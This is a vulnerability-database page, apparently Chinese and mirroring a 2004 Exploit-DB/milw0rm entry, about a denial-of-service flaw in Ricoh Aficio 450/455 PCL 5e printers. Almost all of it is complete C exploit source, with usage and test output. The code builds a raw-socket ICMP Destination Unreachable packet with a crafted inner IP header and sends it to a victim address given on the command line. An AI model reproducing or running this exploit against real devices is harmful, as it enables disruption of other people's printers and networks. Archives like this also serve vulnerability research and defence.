Ricoh Aficio 450/455 PCL 5e Printer – ICMP Denial of Service

Ricoh Aficio 450/455 PCL 5e Printer – ICMP Denial of Service

漏洞ID 1054816 漏洞类型
发布时间 2004-12-15 更新时间 2004-12-15
图片[1]-Ricoh Aficio 450/455 PCL 5e Printer – ICMP Denial of Service-安全小百科CVE编号 N/A
图片[2]-Ricoh Aficio 450/455 PCL 5e Printer – ICMP Denial of Service-安全小百科CNNVD-ID N/A
漏洞平台 Hardware CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/688
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*

* RICOH Aficio 450/455 PCL 5e Printer ICMP DOS vulnerability Exploit.

* DATE: 12.15.2004

* Vuln Advisory : Hongzhen Zhou<felix__zhou _at_ hotmail _dot_ com>

* Exploit Writer : x90c(Kyong Joo)@www.chollian.net/~jyj9782

*

* Testing -----------------------------------------------

* root@testbed:~/raw# gcc -o rpcl_icmpdos rpcl_icmpdos.c

* root@testbed:~/raw# ./rpcl_icmpdos

* Usage: ./rpcl_icmpdos <victim>

* root@testbed:~/raw# ./rpcl_icmpdos 192.168.2.4

* exploit sent ok() = ..x-_-x..

* root@testbed:~/raw#

*

*/

#include<sys/types.h>

#include<sys/socket.h>

#include<netinet/in.h>

#include<arpa/inet.h>

#include<linux/ip.h>

#include<linux/icmp.h>

unsigned short cksum(unsigned short *buf, int len);

struct icmp_packet{

       struct icmphdr icmp;

       struct iphdr inip;

       unsigned char bigger[90];               // STEP1: Bigger Data(ICMP Header(8)+ inip(20) + 90(bigger data))

} packet;

/* ########################

* #     Entry Point      #

* ########################

*/

int main(int argc, char *argv[]){

struct sockaddr_in ca;

int sockfd, ret;

if(argc<2){

       printf("Usage: %s <victim>n", argv[0]);

       exit(-1);

}

sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP);

memset(&packet, 0, sizeof(packet));

packet.icmp.type = 3;                           // STEP2: Destination Unreachable.

packet.icmp.code = 1;

packet.icmp.un.echo.id = getpid();

packet.icmp.un.echo.sequence = 0;

packet.inip.ihl = 5;

packet.inip.version = 4;

packet.inip.tot_len = htons(20);

packet.inip.id = htons(9090);

packet.inip.ttl = 90;

packet.inip.protocol = IPPROTO_TCP;             // STEP3: IPPROTO_UDP also useable.

packet.inip.saddr = inet_addr("127.0.0.1");

packet.inip.daddr = inet_addr("127.0.0.1");

packet.inip.check = (unsigned short) cksum((unsigned short *)&packet.inip, 20);

packet.icmp.checksum = cksum((void *)&packet, sizeof(packet));

memset(&ca, 0, sizeof(ca));

ca.sin_family = AF_INET;

ca.sin_addr.s_addr = inet_addr(argv[1]);

if((sendto(sockfd, &packet, sizeof(packet), 0, (struct sockaddr *)&ca, sizeof(ca))) == sizeof(packet))

       printf("exploit sent ok() = ..x-_-x..n");

else

       printf("exploit sent failed() = ..o^O^o..n");

close(sockfd);

}

/* ########################

* #  Internet Checksum   #

* ########################

*/

unsigned short cksum(unsigned short *buf, int len){

register unsigned long sum;

for(sum = 0; len > 0; len--) sum += *buf++;

sum = (sum >> 16) + (sum & 0xffff);

sum += (sum >> 16);

return ~sum;

}

// milw0rm.com [2004-12-15]

相关推荐: WWW File Share Pro目录遍历漏洞

WWW File Share Pro目录遍历漏洞 漏洞ID 1201955 漏洞类型 路径遍历 发布时间 2004-02-17 更新时间 2004-02-17 CVE编号 CVE-2004-0059 CNNVD-ID CNNVD-200402-060 漏洞平台…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享